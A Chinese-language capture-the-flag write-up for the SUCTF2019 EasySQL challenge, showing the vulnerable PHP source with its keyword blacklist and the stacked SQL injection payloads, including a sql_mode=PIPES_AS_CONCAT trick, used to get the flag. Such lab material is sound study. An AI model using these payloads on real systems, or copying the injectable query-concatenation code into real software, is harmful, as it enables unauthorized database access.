SUCTF2019-EasySQL

题目

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ExR5uHy2-1581163879403)(E:\CTF\小白学习总结\1-BUUCTF\WEB\EasySQL\pic\ti.PNG)]

writeup

尝试输入:1

SUCTF2019-EasySQL_第1张图片

SUCTF2019-EasySQL_第2张图片

尝试众多后发现有三种返回值:

  • 正常回显
  • nonono
  • 空白

考虑到前面做过的题,堆叠注入

上网查看各位大佬的文章,找到了源码:


    session_start();

    include_once "config.php";

    $post = array();
    $get = array();
    global $MysqlLink;

    //GetPara();
    $MysqlLink = mysqli_connect("localhost",$datauser,$datapass);
    if(!$MysqlLink){
        die("Mysql Connect Error!");
    }
    $selectDB = mysqli_select_db($MysqlLink,$dataName);
    if(!$selectDB){
        die("Choose Database Error!");
    }

    foreach ($_POST as $k=>$v){
        if(!empty($v)&&is_string($v)){
            $post[$k] = trim(addslashes($v));
        }
    }
    foreach ($_GET as $k=>$v){
        }
    }
    //die();
    ?>

<html>
<head>
</head>

<body>

<a> Give me your flag, I will tell you if the flag is right. </ a>
<form action="" method="post">
<input type="text" name="query">
<input type="submit">
</form>
</body>
</html>



    if(isset($post['query'])){
        $BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
        //var_dump(preg_match("/{$BlackList}/is",$post['query']));
        if(preg_match("/{$BlackList}/is",$post['query'])){
            //echo $post['query'];
            die("Nonono.");
        }
        if(strlen($post['query'])>40){
            die("Too long.");
        }
        $sql = "select ".$post['query']."||flag from Flag";
        mysqli_multi_query($MysqlLink,$sql);
        do{
            if($res = mysqli_store_result($MysqlLink)){
                while($row = mysqli_fetch_row($res)){
                    print_r($row);
                }
            }
        }while(@mysqli_next_result($MysqlLink));

    }

    ?>

看到mysql_multi_query(),可以堆叠注入

发现黑名单:

if(isset($post['query'])){
        $BlackList = "prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&|\"";
        //var_dump(preg_match("/{$BlackList}/is",$post['query']));
        if(preg_match("/{$BlackList}/is",$post['query'])){
            //echo $post['query'];
            die("Nonono.");
        }

过滤了很多,尤其是flag。。。好气哦~

按照之前的尝试查询(随便注)

1 ; show databases;

SUCTF2019-EasySQL_第3张图片

1 ; show tables;

SUCTF2019-EasySQL_第4张图片

但是过滤了flag。。。

查找资料发现管道拼接||

且源码中存在:

$sql = "select ".$post['query']."||flag from Flag";

对于mysql可以通过更改sql_mode=PIPES_AS_CONCAT来满足该功能

故,构造:

1;set sql_mode=PIPES_AS_CONCAT;select 1

SUCTF2019-EasySQL_第5张图片

得到flag~

知识点

mysql 修改sql_mode 实现字符串管道‘||’连接

在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接,但在mysql 缺省不支持。需要调整mysql 的sql_mode 模式:pipes_as_concat 来实现oracle 的一些功能

https://blog.csdn.net/lixora/article/details/60572357

你可能感兴趣的:(CTF之Web)